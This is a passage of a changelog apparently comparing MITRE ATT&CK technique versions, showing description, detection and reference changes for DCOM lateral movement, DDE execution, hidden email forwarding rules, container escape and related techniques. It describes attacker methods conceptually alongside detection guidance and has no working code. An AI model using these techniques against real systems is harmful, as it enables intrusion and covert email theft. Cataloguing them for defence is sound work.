DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM) Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL) Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
x_mitre_detectionMonitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'MSDN WMI', 'description': 'Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.', 'url': 'https://msdn.microsoft.com/en-us/library/aa394582.aspx'}

[T1078.002] Valid Accounts: Domain Accounts

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Jon Sternstein, Stern Security']
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:42:11.787000+00:002021-10-19 03:29:47.651000+00:00
x_mitre_detectionConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). On Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Ubuntu SSSD Docs', 'description': 'Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.', 'url': 'https://ubuntu.com/server/docs/service-sssd'}
x_mitre_data_sourcesLogon Session: Logon Session Metadata

[T1583.001] Acquire Infrastructure: Domains

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Domain Name: Active DNS', 'Domain Name: Passive DNS', 'Domain Name: Domain Registration']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:50:38.792000+00:002021-10-16 17:09:26.334000+00:00
x_mitre_detectionDomain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1584.001] Compromise Infrastructure: Domains

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Domain Name: Active DNS', 'Domain Name: Passive DNS', 'Domain Name: Domain Registration']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:02:43.030000+00:002021-10-17 15:51:26.715000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1

[T1189] Drive-by Compromise

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 23:48:15.056000+00:002021-07-28 01:37:46.704000+00:00
x_mitre_detectionFirewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before. Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code. Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before. Network intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code. Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.
x_mitre_version1.21.3

[T1608.004] Stage Capabilities: Drive-by Target

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 17:52:55.302000+00:002021-10-17 16:27:38.793000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
x_mitre_version1.01.1

[T1559.002] Inter-Process Communication: Dynamic Data Exchange

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use Windows Dynamic Data Exchange (DDE) to et1Adversaries may use Windows Dynamic Data Exchange (DDE) to e
>xecute arbitrary commands. DDE is a client-server protocol f>xecute arbitrary commands. DDE is a client-server protocol f
>or one-time and/or continuous inter-process communication (I>or one-time and/or continuous inter-process communication (I
>PC) between applications. Once a link is established, applic>PC) between applications. Once a link is established, applic
>ations can autonomously exchange transactions consisting of >ations can autonomously exchange transactions consisting of 
>strings, warm data links (notifications when a data item cha>strings, warm data links (notifications when a data item cha
>nges), hot data links (duplications of changes to a data ite>nges), hot data links (duplications of changes to a data ite
>m), and requests for command execution.  Object Linking and >m), and requests for command execution.  Object Linking and 
>Embedding (OLE), or the ability to link data between documen>Embedding (OLE), or the ability to link data between documen
>ts, was originally implemented through DDE. Despite being su>ts, was originally implemented through DDE. Despite being su
>perseded by [Component Object Model](https://attack.mitre.or>perseded by [Component Object Model](https://attack.mitre.or
>g/techniques/T1559/001), DDE may be enabled in Windows 10 an>g/techniques/T1559/001), DDE may be enabled in Windows 10 an
>d most of Microsoft Office 2016 via Registry keys. (Citation>d most of Microsoft Office 2016 via Registry keys. (Citation
>: BleepingComputer DDE Disabled in Word Dec 2017) (Citation:>: BleepingComputer DDE Disabled in Word Dec 2017) (Citation:
> Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advi> Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advi
>sory Nov 2017)  Microsoft Office documents can be poisoned w>sory Nov 2017)  Microsoft Office documents can be poisoned w
>ith DDE commands (Citation: SensePost PS DDE May 2016) (Cita>ith DDE commands (Citation: SensePost PS DDE May 2016) (Cita
>tion: Kettle CSV DDE Aug 2014), directly or through embedded>tion: Kettle CSV DDE Aug 2014), directly or through embedded
> files (Citation: Enigma Reviving DDE Jan 2018), and used to> files (Citation: Enigma Reviving DDE Jan 2018), and used to
> deliver execution via [Phishing](https://attack.mitre.org/t> deliver execution via [Phishing](https://attack.mitre.org/t
>echniques/T1566) campaigns or hosted Web content, avoiding t>echniques/T1566) campaigns or hosted Web content, avoiding t
>he use of Visual Basic for Applications (VBA) macros. (Citat>he use of Visual Basic for Applications (VBA) macros. (Citat
>ion: SensePost MacroLess DDE Oct 2017) DDE could also be lev>ion: SensePost MacroLess DDE Oct 2017) DDE could also be lev
>eraged by an adversary operating on a compromised machine wh>eraged by an adversary operating on a compromised machine wh
>o does not have direct access to a [Command and Scripting In>o does not have direct access to a [Command and Scripting In
>terpreter](https://attack.mitre.org/techniques/T1059).>terpreter](https://attack.mitre.org/techniques/T1059). DDE e
 >xecution can be invoked remotely via [Remote Services](https
 >://attack.mitre.org/techniques/T1021) such as [Distributed C
 >omponent Object Model](https://attack.mitre.org/techniques/T
 >1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 19:32:56.572000+00:002021-07-26 22:52:04.196000+00:00
descriptionAdversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
external_references[8]['source_name']NVisio Labs DDE Detection Oct 2017Fireeye Hunting COM June 2019
external_references[8]['description']NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.
external_references[8]['url']https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NVisio Labs DDE Detection Oct 2017', 'description': 'NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.', 'url': 'https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/'}

[T1055.001] Process Injection: Dynamic-link Library Injection

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:30.879000+00:002021-10-18 12:20:00.382000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1114] Email Collection

Current version: 2.3

Version changed from: 2.2 → 2.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:22:44.435000+00:002021-10-15 20:19:33.750000+00:00
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsmacOS
x_mitre_platformsLinux

[T1114.003] Email Collection: Email Forwarding Rule

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may setup email forwarding rules to collect senst1Adversaries may setup email forwarding rules to collect sens
>itive information. Adversaries may abuse email-forwarding ru>itive information. Adversaries may abuse email-forwarding ru
>les to monitor the activities of a victim, steal information>les to monitor the activities of a victim, steal information
>, and further gain intelligence on the victim or the victim’>, and further gain intelligence on the victim or the victim’
>s organization to use as part of further exploits or operati>s organization to use as part of further exploits or operati
>ons.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook W>ons.(Citation: US-CERT TA18-068A 2018) Furthermore, email fo
>eb App (OWA) allow users to create inbox rules for various e>rwarding rules can allow adversaries to maintain persistent 
>mail functions, including forwarding to a different recipien>access to victim's emails even after compromised credentials
>t. Similarly, Google Workspace users or administrators can s> are reset by administrators.(Citation: Pfammatter - Hidden 
>et up mail forwarding rules via the Google Workspace web int>Inbox Rules) Most email clients allow users to create inbox 
>erface. Messages can be forwarded to internal or external re>rules for various email functions, including forwarding to a
>cipients, and there are no restrictions limiting the extent > different recipient. These rules may be created through a l
>of this rule. Administrators may also create forwarding rule>ocal email application, a web interface, or by command-line 
>s for user accounts with the same considerations and outcome>interface. Messages can be forwarded to internal or external
>s.(Citation: Microsoft Tim McMichael Exchange Mail Forwardin> recipients, and there are no restrictions limiting the exte
>g 2)   Any user or administrator within the organization (or>nt of this rule. Administrators may also create forwarding r
> adversary with valid credentials) can create rules to autom>ules for user accounts with the same considerations and outc
>atically forward all received messages to another recipient,>omes.(Citation: Microsoft Tim McMichael Exchange Mail Forwar
> forward emails to different locations based on the sender, >ding 2)(Citation: Mac Forwarding Rules)  Any user or adminis
>and more.>trator within the organization (or adversary with valid cred
 >entials) can create rules to automatically forward all recei
 >ved messages to another recipient, forward emails to differe
 >nt locations based on the sender, and more. Adversaries may 
 >also hide the rule by making use of the Microsoft Messaging 
 >API (MAPI) to modify the rule properties, making it hidden a
 >nd not visible from Outlook, OWA or most Exchange Administra
 >tion tools.(Citation: Pfammatter - Hidden Inbox Rules)

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-25 13:08:30.699000+00:002021-10-15 20:19:33.416000+00:00
descriptionAdversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules) Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)
external_references[2]['source_name']Microsoft Tim McMichael Exchange Mail Forwarding 2Pfammatter - Hidden Inbox Rules
external_references[2]['description']McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.
external_references[2]['url']https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
x_mitre_detectionDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules) Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Tim McMichael Exchange Mail Forwarding 2', 'description': 'McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.', 'url': 'https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/'}
external_references{'source_name': 'Mac Forwarding Rules', 'description': 'Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.', 'url': 'https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac'}
x_mitre_contributorsMicrosoft Security
x_mitre_platformsmacOS
x_mitre_platformsLinux

[T1611] Escape to Host

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may break out of a container to gain access to tt1Adversaries may break out of a container to gain access to t
>he underlying host. This can allow an adversary access to ot>he underlying host. This can allow an adversary access to ot
>her containerized resources from the host level or to the ho>her containerized resources from the host level or to the ho
>st itself. In principle, containerized resources should prov>st itself. In principle, containerized resources should prov
>ide a clear separation of application functionality and be i>ide a clear separation of application functionality and be i
>solated from the host environment.(Citation: Docker Overview>solated from the host environment.(Citation: Docker Overview
>)  There are multiple ways an adversary may escape to a host>)  There are multiple ways an adversary may escape to a host
> environment. Examples include creating a container configur> environment. Examples include creating a container configur
>ed to mount the host’s filesystem using the bind parameter, >ed to mount the host’s filesystem using the bind parameter, 
>which allows the adversary to drop payloads and execute cont>which allows the adversary to drop payloads and execute cont
>rol utilities such as cron on the host, and utilizing a priv>rol utilities such as cron on the host, or utilizing a privi
>ileged container to run commands on the underlying host.(Cit>leged container to run commands on the underlying host.(Cita
>ation: Docker Bind Mounts)(Citation: Trend Micro Privileged >tion: Docker Bind Mounts)(Citation: Trend Micro Privileged C
>Container)(Citation: Intezer Doki July 20) Gaining access to>ontainer)(Citation: Intezer Doki July 20) Adversaries may al
> the host may provide the adversary with the opportunity to >so escape via [Exploitation for Privilege Escalation](https:
>achieve follow-on objectives, such as establishing persisten>//attack.mitre.org/techniques/T1068), such as exploiting vul
>ce, moving laterally within the environment, or setting up a>nerabilities in global symbolic links in order to access the
> command and control channel on the host.> root directory of a host machine.(Citation: Windows Server 
 >Containers Are Open)  Gaining access to the host may provide
 > the adversary with the opportunity to achieve follow-on obj
 >ectives, such as establishing persistence, moving laterally 
 >within the environment, or setting up a command and control 
 >channel on the host.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 16:14:59.756000+00:002021-10-15 14:59:35.913000+00:00
descriptionAdversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Windows Server Containers Are Open', 'description': "Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.", 'url': 'https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/'}
x_mitre_contributorsYuval Avrahami, Palo Alto Networks
x_mitre_contributorsDaniel Prizmant, Palo Alto Networks

[T1585] Establish Accounts

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Persona: Social Media', 'Network Traffic: Network Traffic Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:10:35.877000+00:002021-10-16 17:35:59.386000+00:00
x_mitre_version1.11.2

[T1098.002] Account Manipulation: Exchange Email Delegate Permissions

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may grant additional permission levels, such as t1Adversaries may grant additional permission levels, such as 
>ReadPermission or FullAccess, to maintain persistent access >ReadPermission or FullAccess, to maintain persistent access 
>to an adversary-controlled email account. The <code>Add-Mail>to an adversary-controlled email account. The <code>Add-Mail
>boxPermission</code> [PowerShell](https://attack.mitre.org/t>boxPermission</code> [PowerShell](https://attack.mitre.org/t
>echniques/T1059/001) cmdlet, available in on-premises Exchan>echniques/T1059/001) cmdlet, available in on-premises Exchan
>ge and in the cloud-based service Office 365, adds permissio>ge and in the cloud-based service Office 365, adds permissio
>ns to a mailbox.(Citation: Microsoft - Add-MailboxPermission>ns to a mailbox.(Citation: Microsoft - Add-MailboxPermission
>)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding>)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding
